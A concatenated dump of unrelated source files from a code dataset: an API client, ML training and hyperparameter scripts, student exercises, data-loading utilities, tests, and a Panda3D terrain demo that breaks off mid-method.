)\n\n # exception handling\n if not success:\n raise exceptions.PlatformException(response)\n\n # return results\n return True\n\n def update(self, checkpoint):\n \"\"\"\n Update Checkpoint changes to platform\n\n :param checkpoint:\n :return: Checkpoint entity\n \"\"\"\n assert isinstance(checkpoint, entities.Checkpoint)\n\n # payload\n payload = checkpoint.to_json()\n\n # request\n success, response = self._client_api.gen_request(req_type='patch',\n path='/checkpoints/{}'.format(checkpoint.id),\n json_req=payload)\n\n # exception handling\n if not success:\n raise exceptions.PlatformException(response)\n\n # return entity\n return entities.Checkpoint.from_json(_json=response.json(),\n client_api=self._client_api,\n project=self._project,\n model=self.model)\n","sub_path":"dtlpy/repositories/checkpoints.py","file_name":"checkpoints.py","file_ext":"py","file_size_in_byte":10133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"563266068","text":"import logging\nfrom urllib.parse import urljoin\nfrom json.decoder import JSONDecodeError\n\nimport requests\n\nlogger = logging.getLogger(__file__)\n\n\nclass BaseEndpoint:\n \"\"\"\n Base class for Actionstep endpoints.\n\n FIXME: Handle expired token race condition\n \"\"\"\n\n resource = None\n\n def __init__(self, base_url: str, access_token: str):\n self.rest_url = urljoin(base_url, \"rest\") + \"/\"\n self.url = urljoin(self.rest_url, self.resource) + \"/\"\n self.headers = {\n \"Content-Type\": \"application/vnd.api+json\",\n \"Accept\": \"application/vnd.api+json\",\n \"Authorization\": f\"Bearer {access_token}\",\n }\n\n def get(self, params=None) -> dict:\n \"\"\"\n Gets a resource, filtered by params.\n Returns a dict or None.\n \"\"\"\n objs = self.list(params)\n if not objs:\n # Empty list.\n return None\n else:\n # Non-empty list.\n assert len(objs) == 1, f\"Wrong number of objs for get: {objs}\"\n return objs[0]\n\n def list(self, params=None) -> list:\n \"\"\"\n Get a resource, filtered by params.\n Returns a list of results.\n \"\"\"\n return self._list(self.url, params)\n\n def _list(self, url, params=None) -> list:\n resp = requests.get(url, params=params, headers=self.headers)\n response_data = self._handle_json_response(url, resp)\n if not response_data:\n # Nothing found.\n return []\n\n data = response_data[self.resource]\n results = []\n results += data if type(data) is list else [data]\n try:\n paging = response_data[\"meta\"][\"paging\"][self.resource]\n except (TypeError, KeyError):\n paging = None\n\n if paging and paging[\"nextPage\"]:\n results += self._list(paging[\"nextPage\"])\n\n return results\n\n def create(self, data: dict):\n \"\"\"\n Create a resource with provided data.\n Returns the created object.\n \"\"\"\n url = self.url\n request_data = {self.resource: [data]}\n resp = requests.post(url, json=request_data, headers=self.headers)\n response_data = self._handle_json_response(url, resp)\n return response_data[self.resource]\n\n def update(self, resource_id: str, data: dict):\n \"\"\"\n Update data in an existing resource.\n Returns the created object.\n \"\"\"\n url = urljoin(self.url, str(resource_id))\n request_data = {self.resource: [data]}\n resp = requests.put(url, json=data, headers=self.headers)\n response_data = self._handle_json_response(url, resp)\n return response_data[self.resource]\n\n def delete(self, resource_id: str):\n \"\"\"\n Delete an existing resource,\n May result in a soft-delete.\n Returns None\n \"\"\"\n url = urljoin(self.url, str(resource_id))\n resp = requests.delete(url, headers=self.headers)\n self._handle_json_response(url, resp)\n\n def _handle_json_response(self, url, resp):\n json = self._try_json_decode(resp)\n try:\n resp.raise_for_status()\n except requests.HTTPError:\n logger.exception(\"Actionstep API called failed: %s\", json)\n raise\n\n return json\n\n def _try_json_decode(self, resp):\n if resp.status_code == 204:\n # No content\n return None\n else:\n return resp.json()\n\n","sub_path":"app/actionstep/api/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"122033587","text":"\n\nfrom xai.brain.wordbase.verbs._cloy import _CLOY\n\n#calss header\nclass _CLOYS(_CLOY, ):\n\tdef __init__(self,): \n\t\t_CLOY.__init__(self)\n\t\tself.name = \"CLOYS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"cloy\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_cloys.py","file_name":"_cloys.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"61171391","text":"import tensorflow as tf\n\nfrom .registry import register\nfrom .utils import HParams\n\n\n@register\ndef default():\n return HParams(\n model=None,\n data=None,\n shuffle_data=True,\n data_augmentations=None,\n train_steps=100000,\n eval_steps=100,\n type=\"image\",\n batch_size=64,\n learning_rate=0.01,\n lr_scheme=\"constant\",\n initializer=\"glorot_normal_initializer\",\n delay=0,\n staircased=False,\n learning_rate_decay_interval=2000,\n learning_rate_decay_rate=0.1,\n clip_grad_norm=1.0,\n l2_loss=0.0,\n prune_val=0.8,\n label_smoothing=0.1,\n use_tpu=False,\n momentum=0.9,\n init_scheme=\"random\",\n warmup_steps=10000,\n use_nesterov=False,\n louizos_cost=0.0,\n l1_norm=0.0,\n thresh=2.5,\n fixed=False,\n var_scale=1,\n klscale=1.0,\n ard_cost=0.0,\n logit_packing=0.0,\n logit_squeezing=0.0,\n clp=0.0,\n logit_bound=None,\n dropout_type=None,\n smallify=0.0,\n smallify_delay=1000,\n linear_drop_rate=False,\n weight_decay_and_noise=False,\n dropout_delay_steps=5000,\n grad_noise_scale=0.0,\n td_nines=0,\n targ_cost=1.0,\n aparams=\"\",\n channels=1)\n\n\n@register\ndef default_cifar10():\n hps = default()\n hps.data = \"cifar10\"\n hps.data_augmentations = [\"image_augmentation\"]\n\n hps.input_shape = [32, 32, 3]\n hps.output_shape = [10]\n hps.channels = 3\n hps.num_classes = 10\n\n return hps\n\n\n@register\ndef default_cifar100():\n hps = default()\n hps.data = \"cifar100\"\n hps.data_augmentations = [\"image_augmentation\"]\n\n hps.input_shape = [32, 32, 3]\n hps.output_shape = [100]\n hps.num_classes = 100\n hps.channels = 3\n\n return hps\n","sub_path":"hparams/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"318571879","text":"def esDiagonal(horizontal, vertical):\n \"\"\" int, int -> bool\n OBJ: Retorna un bool si la casilla esta en la vertical del tablero\"\"\"\n return horizontal == vertical\n \n\ndef esImparPar(horizontal, vertical):\n \"\"\" int, int -> str\n OBJ: Imprime si dos coordenadas estan en casilla par o impar\"\"\"\n if (horizontal + vertical) % 2 == 0:\n return \"Impar\"\n else:\n return \"Par\"\n \ndef esDiagonalInversa(horizontal, vertical, tamaño_tablero):\n \"\"\"int, int, int -> bool\n OBJ: Detemina dos coordenas estan en la diagonal inversaa\n \"\"\"\n return (horizontal + vertical) == tamaño_tablero\n \ndef esEntero():\n \"\"\" none -> int\n OBJ: pide un valor y lo retorna solo si es entero\"\"\"\n \n numero = input(\"Introduce un entero-positivo: \")\n \n while type(numero) != int:\n \n try:\n numero = int(numero)\n \n except:\n print(\"2\")\n print(\"El numero introducido no es valido\")\n \n numero = input(\"Introduce un entero-positivo: \")\n \n return numero\n \ndef esPositivo():\n \"\"\" none -> int > 0\n OBJ: detemina si un int es mayor que 0\"\"\"\n \n numero = esEntero()\n\n while numero < 0:\n numero = esEntero()\n \n return numero\n \ndef mostrarTablero(tamaño_tablero):\n \"\"\" int -> none\n OBJ: muestra un tablero en funcion de un tamaño\"\"\"\n \n for i in range(0,tamaño_tablero):\n for j in range(0,tamaño_tablero):\n if esDiagonal(i,j):\n print(\"#\", end=\"\")\n \n elif esDiagonalInversa(i,j, tamaño_tablero-1):\n print(\"$\", end=\"\")\n \n elif esImparPar(i,j) == \"Impar\":\n print(\"O\", end=\"\")\n else:\n print(\"X\", end=\"\") \n print()\n \n\ntamaño_tablero = esPositivo()\nmostrarTablero(tamaño_tablero)\n","sub_path":"laboratorio/EjerciciosExamen/problema2-4.py","file_name":"problema2-4.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"554980507","text":"#Exercício 3\n\nvoto=int(input(\"Insira o seu voto (1, 2, 3 ,4), (0 para voto nulo), (9 para voto em branco) e (-1 para terminar) : \"))\ncandidato1 = 0\ncandidato2 = 0\ncandidato3 = 0\ncandidato4 = 0\nvotobranco = 0\nvotonulo = 0\nwhile voto != -1:\n if voto == 1:\n candidato1 += 1\n if voto == 2:\n candidato2 += 1\n if voto == 3:\n candidato3 += 1\n if voto == 4:\n candidato4 += 1\n if voto == 0:\n votobranco += 1\n if voto == 9:\n votonulo += 1\n voto=int(input(\"Insira o seu voto (1, 2, 3 ,4), (0 para voto nulo), (9 para voto em branco) e (-1 para terminar) : \"))\n\ntotalvotos= candidato1 + candidato2 + candidato3 + candidato4 + votonulo + votobranco\npercentagem_candidato1 = (candidato1 * 100) / totalvotos\npercentagem_candidato2 = (candidato2 * 100) / totalvotos\npercentagem_candidato3 = (candidato3 * 100) / totalvotos\npercentagem_candidato4 = (candidato4 * 100) / totalvotos\npercentagem_branco = (votonulo * 100) / totalvotos\npercentagem_nulo = ( votobranco * 100) / totalvotos\n\nprint(\"O total de votos desta eleição são : {}\".format(totalvotos))\nprint(\"O total de votos para o candidato 1 são : {}\".format(candidato1))\nprint(\"O total de votos para o candidato 2 são : {}\".format(candidato2))\nprint(\"O total de votos para o candidato 3 são : {}\".format(candidato3))\nprint(\"O total de votos para o candidato 4 são : {}\".format(candidato4))\nprint(\"O total de votos em branco são : {}\".format(votobranco))\nprint(\"O total de votos nulos são : {}\".format(votonulo))\nprint(\"A percentagem de votos para o candidato 1 são : {} %\".format(percentagem_candidato1))\nprint(\"A percentagem de votos para o candidato 2 são : {} %\".format(percentagem_candidato2))\nprint(\"A percentagem de votos para o candidato 3 são : {} %\".format(percentagem_candidato3))\nprint(\"A percentagem de votos para o candidato 4 são : {} %\".format(percentagem_candidato4))\nprint(\"A percentagem de votos em branco são : {} %\".format(percentagem_branco))\nprint(\"A percentagem de votos nulos são : {} %\".format(percentagem_nulo))","sub_path":"ficha 3 entregar/Ex3.py","file_name":"Ex3.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"602960136","text":"first = {\"x\": 3, \"y\": 4, \"f\": [1, 3, {\"a\": 3}], \"z\": 22.3337, \"t\": 7, \"l\": \"qwe\"}\nsecond = {\"x\": 2, \"y\": 4, \"f\": [1, 3, {\"a\": 4}], \"z\": 22.33335, \"t\": 6}\n\n\ndef equal_reporter(obj1, obj2, path):\n if isinstance(obj1, dict) and isinstance(obj2, dict):\n diff = set(list(obj1)) ^ set(list(obj2))\n if diff:\n yield f\"path - {path}, mismatching keys {diff}\"\n intersection = set(list(obj1)) & set(list(obj2))\n for i in intersection:\n p = path + f\"/{i}\"\n yield from equal_reporter(obj1[i], obj2[i], p)\n elif isinstance(obj1, list) and isinstance(obj2, list):\n if len(obj1) != len(obj2):\n yield f\"path - {path} Lists have different lengths {len(obj1)} != {len(obj2)}\"\n else:\n for k, v in enumerate(obj1):\n p = path + f\"/[{k}]\"\n yield from equal_reporter(v, obj2[k], p)\n elif isinstance(obj1, int) and isinstance(obj2, int) and obj1 != obj2:\n yield f\"path - {path}, {obj1} != {obj2}\"\n elif isinstance(obj1, float) and isinstance(obj2, float):\n if round(obj1, 5) != round(obj2, 5):\n yield f\"path - {path}, {obj1} != {obj2}\"\n elif isinstance(obj1, str) and isinstance(obj2, str) and obj1 != obj2:\n yield f\"path - {path}, {obj1} != {obj2}\"\n elif type(obj1) != type(obj2):\n yield f\"path - {path}, type {type(obj1)} != {type(obj2)}\"\n\n\ndef is_equal(obj1, obj2):\n diff = []\n for x in equal_reporter(obj1, obj2, \"root\"):\n diff.append(x)\n print(\"RESULT: \")\n if diff:\n print(\"objects are not identical \\n\")\n for d in diff:\n print(d)\n else:\n print(\"objects are identical\")\n\n\nis_equal(first, second)\n","sub_path":"test1/json_comparison.py","file_name":"json_comparison.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"360116300","text":"import json\nfrom os.path import join, exists\nfrom tempfile import TemporaryDirectory\n\nimport numpy as np\n\nfrom delphi_cdc_covidnet.api_config import APIConfig\nfrom delphi_cdc_covidnet.covidnet import CovidNet\n\n\nclass TestCovidNet:\n\n def test_mappings(self):\n with TemporaryDirectory() as temp_dir:\n init_file = join(temp_dir, \"init.json\")\n\n # Perform the download\n CovidNet.download_mappings(\n url=APIConfig.INIT_URL,\n outfile=init_file)\n\n assert exists(init_file)\n\n with open(init_file, \"r\") as f_json:\n mappings = json.load(f_json)\n\n # Check if the used keys are in the file\n used_keys = [\"catchments\", \"mmwr\", \"ages\"]\n for key in used_keys:\n assert key in mappings.keys(), f\"Key '{key}' missing from mappings\"\n\n catchment_info, mmwr_info, age_info = CovidNet.read_mappings(init_file)\n\n # Catchment columns\n catchment_cols = [\"networkid\", \"catchmentid\", \"area\", \"name\"]\n for col in catchment_cols:\n assert col in catchment_info.columns\n\n # MMWR columns\n mmwr_cols = [\"year\", \"weeknumber\", \"weekstart\", \"weekend\"]\n for col in mmwr_cols:\n assert col in mmwr_info.columns\n assert mmwr_info[\"weekstart\"].dtype == np.dtype(\"datetime64[ns]\")\n assert mmwr_info[\"weekend\"].dtype == np.dtype(\"datetime64[ns]\")\n assert (mmwr_info[\"weekstart\"] < mmwr_info[\"weekend\"]).all()\n\n # Age columns\n age_cols = [\"ageid\", \"parentid\", \"label\"]\n for col in age_cols:\n assert col in age_info.columns\n assert (age_info[\"label\"] == \"Overall\").any(), \"Missing overall age-group\"\n\n def test_hosp_data(self):\n # Download mappings file\n with TemporaryDirectory() as temp_dir:\n init_file = join(temp_dir, \"init.json\")\n CovidNet.download_mappings(\n url=APIConfig.INIT_URL,\n outfile=init_file)\n catchment_info, _, _ = CovidNet.read_mappings(init_file)\n\n # Download all state files\n states_idx = catchment_info[\"area\"] != \"Entire Network\"\n num_states = states_idx.sum()\n\n # Non-parallel\n state_files = CovidNet.download_all_hosp_data(\n init_file, temp_dir, parallel=False)\n assert len(state_files) == num_states\n for state_file in state_files:\n assert exists(state_file)\n\n # Parallel\n state_files_par = CovidNet.download_all_hosp_data(\n init_file, temp_dir, parallel=True)\n assert set(state_files) == set(state_files_par)\n assert len(state_files_par) == num_states\n for state_file in state_files_par:\n assert exists(state_file)\n\n # Run the combining function\n hosp_df = CovidNet.read_all_hosp_data(state_files)\n\n # Check all used columns are there\n df_cols = [\"mmwr-year\", \"mmwr-week\", \"catchment\", \"cumulative-rate\"]\n for col in df_cols:\n assert col in hosp_df.columns, f\"Column '{col}' missing from dataframe\"\n\n # Verify we indeed have data for each state we downloaded for\n assert set(hosp_df[\"catchment\"].unique()) == set(catchment_info.loc[states_idx, \"area\"])\n","sub_path":"cdc_covidnet/tests/test_covidnet.py","file_name":"test_covidnet.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"329556670","text":"import sklearn\nimport tensorflow as tf\nfrom keras import Sequential, Input, Model\nfrom keras.layers import Dense\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nimport matplotlib.pyplot as plt\n\nfrom mp3tagger.training.utils import load_data, preprocessing\n\ndef model_baseline():\n inputs = Input(shape=(13,))\n x = Dense(100, activation='sigmoid', kernel_initializer='he_normal')(inputs)\n outputs = Dense(3, activation='softmax', kernel_initializer='he_normal')(x)\n model = Model(inputs=inputs, outputs=outputs)\n model.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\ndf = load_data()\ndf = preprocessing(df)\n\nx, y = shuffle(df.to_numpy()[:,:-1], df.to_numpy()[:,-1])\nx_train, x_val, y_train, y_val = train_test_split(x, y, test_size=0.2, random_state=40)\n\n# 使用Feature Scaling後準確率上升快2%!\nuse_standardization = True\nuse_normalization = True\n\nif use_standardization:\n x_train = sklearn.preprocessing.scale(x_train)\n x_val = sklearn.preprocessing.scale(x_val)\nif use_normalization:\n x_train = sklearn.preprocessing.scale(x_train)\n x_val = sklearn.preprocessing.scale(x_val)\n\n# epochs大約在50就收斂了\n# batch_size大一點accuracy會比較穩定\n# batch_size大約在75~100間\nmodel = model_baseline()\nresult = model.fit(x_train, y_train, epochs=50, batch_size=100, verbose=2,\n validation_data=(x_val, y_val))\n\n\nfig = plt.figure()\nax1 = fig.add_subplot(211)\nax2 = fig.add_subplot(212)\n\nax1.plot(result.epoch, result.history['accuracy'], color='blue',\n linewidth=3, label='train acc')\nax1.plot(result.epoch, result.history['val_accuracy'], color='magenta',\n linewidth=3, label='val acc')\n\nax2.plot(result.epoch, result.history['loss'], color='blue',\n linewidth=3, label='train loss')\nax2.plot(result.epoch, result.history['val_loss'], color='magenta',\n linewidth=3, label='val loss')\nax1.legend()\nax1.set_xlabel('epochs')\nax1.set_ylabel('Accuracy')\nax1.set_ylim([0.825, 1])\nax2.legend()\nax2.set_xlabel('epochs')\nax2.set_ylabel('Loss')\nax2.set_ylim([0.1, 0.5])\nplt.show()\n# loss, acc = four_layer.evaluate(x_test, y_test, verbose=1)\n\n\n\n\n\nprint('')\n\n","sub_path":"mp3tagger/training/models/obsolete/mlp_baseline.py","file_name":"mlp_baseline.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157354799","text":"from os import path\nfrom io import BytesIO\nfrom typing import Union\n\nimport numpy as np\nfrom PIL import Image\nfrom cloudfiles import CloudFiles\nfrom cloudvolume import Storage\n\n\ndef _load_image(p: bytes):\n \"\"\"\n Open TIF image and convert to numpy ndarray of dtype.\n Currently tested for only for uint8 -> uint8, uint32 or uint24 -> uint32\n \"\"\"\n img_arr = np.array(Image.open(BytesIO(p)))\n if len(img_arr.shape) == 3:\n img_arr = np.dstack((np.zeros(img_arr.shape[:2] + (1,)), img_arr))\n img_arr = img_arr[:, :, ::-1]\n img_arr = img_arr.astype(np.uint8).view(np.uint32)\n img_arr = img_arr.reshape(img_arr.shape[:2]).T\n return img_arr.astype(np.uint32)\n\n\ndef load_images(p: str, extension: str = \"tif\") -> dict:\n \"\"\"Assume directory contains only the images to be stored\"\"\"\n files = CloudFiles(p)\n names = []\n for f in sorted(files.list()):\n if extension in f:\n names.append(f)\n\n files.get(names, raw=True)\n files_bytes = [files[k] for k in names]\n\n imgs = []\n for f in files_bytes:\n imgs.append(_load_image(f))\n return {\"seg\": np.asarray(imgs).transpose(2, 1, 0)}\n\n\ndef load_from_omni_h5(f) -> dict:\n from h5py import File\n\n omni_types = {\"working\": 1, \"valid\": 2, \"uncertain\": 3}\n dirpath = path.split(f)[0]\n with File(f, \"r\") as f:\n data = np.squeeze(np.array(f[\"main\"])).transpose(2, 1, 0)\n if len(data.shape) > 3:\n print(\"only support 3 dimensional dataset\")\n return None\n if data.dtype == np.uint8 or data.dtype == np.float32:\n return {\"raw_image\": data}\n try:\n seg_type = np.loadtxt(\n path.join(dirpath, \"segments.txt\"),\n dtype=(int, int),\n delimiter=\",\",\n skiprows=2,\n )\n except IOError:\n return {\"seg\": data.astype(np.uint32)}\n\n seg_data = {\"seg\": data.astype(np.uint32)}\n seg_type = dict(seg_type)\n for k in omni_types:\n seg = np.copy(data)\n fltr = np.vectorize(\n lambda x: True\n if x not in seg_type or seg_type[x] != omni_types[k]\n else False\n )\n mask = fltr(seg)\n seg[mask] = 0\n seg_data[k] = seg.astype(np.uint32)\n return seg_data\n\n\ndef write_to_dir(dst_dir, img_arr, extension=\"tif\"):\n \"\"\"Split 3d ndimgay along z dim into 2d sections & save as tifs\"\"\"\n for k in range(img_arr.shape[2]):\n f = path.join(dst_dir, \"{0:03d}.{1}\".format(k + 1, extension))\n img = Image.fromarray(img_arr[:, :, k].T)\n img.save(f)\n\n\ndef write_to_cloud_bucket(dst_dir, img_arr, extension=\"tif\"):\n cf = CloudFiles(dst_dir)\n for k in range(img_arr.shape[2]):\n img = Image.fromarray(img_arr[:, :, k].T)\n img_bytes = BytesIO()\n img.save(img_bytes, format=\"tiff\" if extension == \"tif\" else extension)\n cf.put(\"{0:03d}.{1}\".format(k + 1, extension), img_bytes.getvalue())\n","sub_path":"specialized-workers/groudtruth/src/data_io.py","file_name":"data_io.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"608370294","text":"'''\nCreated on 03/mar/2012\n\n@author: consultit\n'''\n\nfrom panda3d.core import Vec4, GeoMipTerrain,TextureStage, \\\n Vec3, TransparencyAttrib, NodePath, \\\n Texture, Point3, CardMaker, TextNode, DirectionalLight, \\\n AmbientLight, Filename, BitMask32, WindowProperties, \\\n LPlanef, PlaneNode, CullFaceAttrib, RenderState, \\\n ShaderAttrib, PandaNode, CollisionTraverser, CollisionRay, \\\n CollisionNode, CollisionHandlerQueue,loadPrcFileData, \\\n loadPrcFile\n\nloadPrcFile(\"../config.prc\")\n#loadPrcFileData(\"\", \"direct-gui-edit #t\")\n#loadPrcFileData(\"\", \"want-directtools #t\")\n#loadPrcFileData(\"\", \"want-tk #t\")\n#loadPrcFileData(\"\", \"task-timer-verbose #t\")\n#loadPrcFileData(\"\", \"fullscreen #t\")\nloadPrcFileData(\"\", \"threading-model Cull/Draw\")\n#loadPrcFileData(\"\", \"want-pstats 1\")\n\n#from panda3d.core import *\nfrom direct.showbase.ShowBase import ShowBase\nfrom direct.gui.DirectGui import *\nfrom direct.actor.Actor import Actor\nfrom direct.task import Task\n\nimport sys, os\n\nSPEED = 0.5\n\n# Figure out what directory this program is in.\nMYDIR = os.path.abspath(sys.path[0])\nMYDIR = Filename.fromOsSpecific(MYDIR).getFullpath()\nprint('running from:' + MYDIR)\n\n# Function to put instructions on the screen.\ndef addInstructions(pos, msg):\n return OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1),\n pos=(-1.3, pos), align=TextNode.ALeft, scale=.05)\n\ndef addTextField(pos, msg):\n return OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1),\n pos=(-1.3, pos), align=TextNode.ALeft, scale=.05, mayChange=True)\n\n# Function to put title on the screen.\ndef addTitle(text):\n return OnscreenText(text=text, style=1, fg=(1, 1, 1, 1),\n pos=(1.3, -0.95), align=TextNode.ARight, scale=.07)\n \nclass WaterNode():\n def __init__(self, world, x1, y1, x2, y2, z):\n print('setting up water plane at z=' + str(z))\n \n # Water surface\n maker = CardMaker('water')\n maker.setFrame(x1, x2, y1, y2)\n\n world.waterNP = world.render.attachNewNode(maker.generate())\n world.waterNP.setHpr(0, -90, 0)\n world.waterNP.setPos(0, 0, z)\n world.waterNP.setTransparency(TransparencyAttrib.MAlpha)\n world.waterNP.setShader(world.loader.loadShader('../Shaders/water.cg'))\n world.waterNP.setShaderInput('wateranim', Vec4(0.03, -0.015, 64.0, 0)) # vx, vy, scale, skip\n # offset, strength, refraction factor (0=perfect mirror, 1=total refraction), refractivity\n world.waterNP.setShaderInput('waterdistort', Vec4(0.4, 4.0, 0.4, 0.45)) \n\n # Reflection plane\n world.waterPlane = LPlanef(Vec3(0, 0, z + 1), Point3(0, 0, z))\n \n planeNode = PlaneNode('waterPlane')\n planeNode.setPlane(world.waterPlane)\n \n # Buffer and reflection camera\n bufferRefl = world.win.makeTextureBuffer('waterBuffer', 512, 512)\n bufferRefl.setClearColor(Vec4(0, 0, 0, 1))\n\n cfa = CullFaceAttrib.makeReverse()\n rs = RenderState.make(cfa)\n\n world.watercamNP = world.makeCamera(bufferRefl)\n world.watercamNP.reparentTo(world.render)\n \n sa = ShaderAttrib.make()\n sa = sa.setShader(world.loader.loadShader('../Shaders/splut3Clipped.cg'))\n\n cam = world.watercamNP.node()\n cam.getLens().setFov(world.camLens.getFov())\n cam.getLens().setNear(1)\n cam.getLens().setFar(5000)\n cam.setInitialState(rs)\n cam.setTagStateKey('Clipped')\n cam.setTagState('True', RenderState.make(sa)) \n\n\n # ---- water textures ---------------------------------------------\n\n # reflection texture, created in realtime by the 'water camera'\n tex0 = bufferRefl.getTexture()\n tex0.setWrapU(Texture.WMClamp)\n tex0.setWrapV(Texture.WMClamp)\n ts0 = TextureStage('reflection')\n world.waterNP.setTexture(ts0, tex0) \n\n # distortion texture\n tex1 = world.loader.loadTexture('../Textures/water.png')\n ts1 = TextureStage('distortion')\n world.waterNP.setTexture(ts1, tex1)\n \nclass myGeoMipTerrain(GeoMipTerrain):\n def __init__(self, name, loader):\n GeoMipTerrain.__init__(self, name)\n self.loader = loader\n \n def update(self, dummy):\n GeoMipTerrain.update(self)\n \n def setMonoTexture(self):\n root = self.getRoot()\n ts = TextureStage('ts')\n tex = self.loader.loadTexture('../Textures/land01_tx_512.png')\n root.setTexture(ts, tex)\n \n def setMultiTexture(self):\n root = self.getRoot()\n # root.setShader(loader.loadShader('../Shaders/splut3.sha'))\n root.setShaderInput('tscale', Vec4(16.0, 16.0, 16.0, 1.0)) # texture scaling\n\n tex1 = self.loader.loadTexture('../Textures/grass_ground2.jpg')\n #tex1.setMinfilter(Texture.FTLinearMipmapLinear)\n tex1.setMinfilter(Texture.FTNearestMipmapLinear)\n tex1.setMagfilter(Texture.FTLinear)\n tex2 = self.loader.loadTexture('../Textures/rock_02.jpg')\n tex2.setMinfilter(Texture.FTNearestMipmapLinear)\n tex2.setMagfilter(Texture.FTLinear)\n tex3 = self.loader.loadTexture('../Textures/sable_et_gravier.jpg')\n tex3.setMinfilter(Texture.FTNearestMipmapLinear)\n tex3.setMagfilter(Texture.FTLinear)\n\n alp1 = self.loader.loadTexture('../Textures/land01_Alpha_1.png')\n alp2 = self.loader.loadTexture('../Textures/land01_Alpha_2.png')\n alp3 = self.loader.loadTexture('../Textures/land01_Alpha_3.png')\n\n ts = TextureStage('tex1') # stage 0\n root.setTexture(ts, tex1) \n ts = TextureStage('tex2') # stage 1\n root.setTexture(ts, tex2)\n ts = TextureStage('tex3') # stage 2\n root.setTexture(ts, tex3)\n\n ts = TextureStage('alp1') # stage 3\n root.setTexture(ts, alp1)\n ts = TextureStage('alp2') # stage 4\n root.setTexture(ts, alp2)\n ts = TextureStage('alp3') # stage 5\n root.setTexture(ts, alp3)\n\n # enable use of the two separate tagged render states for our two cameras\n root.setTag('Normal', 'True') \n root.setTag('Clipped', 'True') \n\nclass World(ShowBase):\n\n def setMouseBtn(self, btn, value):\n self.mousebtn[btn] = value\n\n def _setup_camera(self):\n \n sa = ShaderAttrib.make()\n sa = sa.setShader(self.loader.loadShader('../Shaders/splut3Normal.cg'))\n \n cam = self.cam.node()\n cam.getLens().setNear(1)\n cam.getLens().setFar(5000)\n cam.setTagStateKey('Normal') \n cam.setTagState('True', RenderState.make(sa)) \n\n def __init__(self):\n \n ShowBase.__init__(self)\n \n # some constants\n self._water_level = Vec4(0.0, 0.0, 12.0, 1.0)\n \n print(str(self.win.getGsg().getMaxTextureStages()) + ' texture stages available')\n self.setFrameRateMeter(True)\n # PStatClient.connect()\n \n self.keyMap = \\\n {\"left\":0, \"right\":0, \"forward\":0, \"cam-left\":0, \\\n \"cam-right\":0, \"cam-up\":0, \"cam-down\":0, \"mouse\":0 }\n \n self.win.setClearColor(Vec4(0, 0, 0, 1))\n \n # Post the instructions\n self.title = addTitle(\"Panda3D Tutorial: Yet Another Roaming Ralph (Walking on uneven terrain too)\")\n self.inst1 = addInstructions(0.95, \"[ESC]: Quit\")\n self.inst2 = addInstructions(0.90, \"[a]: Rotate Ralph Left\")\n self.inst3 = addInstructions(0.85, \"[d]: Rotate Ralph Right\")\n self.inst4 = addInstructions(0.80, \"[s]: Run Ralph Forward\")\n self.inst4 = addInstructions(0.70, \"[Left Button]: move camera forwards\")\n self.inst4 = addInstructions(0.65, \"[Right Button]: move camera backwards\")\n self.loc_text = addTextField(0.45, \"[LOC]: \")\n \n # -------------------------------------------------------------------\n # Set up the environment\n \n # GeoMipTerrain\n self.terrain = myGeoMipTerrain('terrain', self.loader)\n self.terrain.setHeightfield(Filename('../Models/land01-map.png'))\n\n # Set terrain properties\n self.terrain.setBlockSize(32)\n self.terrain.setNear(10)\n self.terrain.setFar(100)\n self.terrain.setFocalPoint(self.cam)\n\n # Store the root NodePath for convenience\n root = self.terrain.getRoot()\n root.reparentTo(self.render)\n root.setSz(30) # z (up) scale\n\n # Generate it.\n self.terrain.generate()\n\n # texture\n # self.terrain.setMonoTexture()\n self.terrain.setMultiTexture() \n self.environ = self.terrain # make available for original ralph code below\n \n # water\n self.water = WaterNode(self, 0, 0, 256, 256, self._water_level.getZ())\n \n # add some lighting\n ambient = Vec4(0.34, 0.3, 0.3, 1)\n direct = Vec4(0.74, 0.7, 0.7, 1)\n \n # ambient light\n alight = AmbientLight('alight')\n alight.setColor(ambient)\n alnp = self.render.attachNewNode(alight)\n self.render.setLight(alnp)\n \n # directional (\"the sun\")\n dlight = DirectionalLight('dlight')\n dlight.setColor(direct)\n dlnp = self.render.attachNewNode(dlight)\n dlnp.setHpr(0.7, 0.2, -0.2)\n self.render.setLight(dlnp)\n \n # make waterlevel and lights available to the terrain shader\n root.setShaderInput('lightvec', Vec4(0.7, 0.2, -0.2, 1))\n root.setShaderInput('lightcolor', direct)\n root.setShaderInput('ambientlight', ambient)\n wl = self._water_level\n wl.setZ(wl.getZ() - 0.05) # add some leeway (gets rid of some mirroring artifacts)\n root.setShaderInput('waterlevel', self._water_level) \n \n # skybox\n self.skybox = self.loader.loadModel('skybox')\n # make big enough to cover whole terrain, else there'll be problems with the water reflections\n self.skybox.setScale(500)\n self.skybox.setBin('background', 1)\n self.skybox.setDepthWrite(0)\n 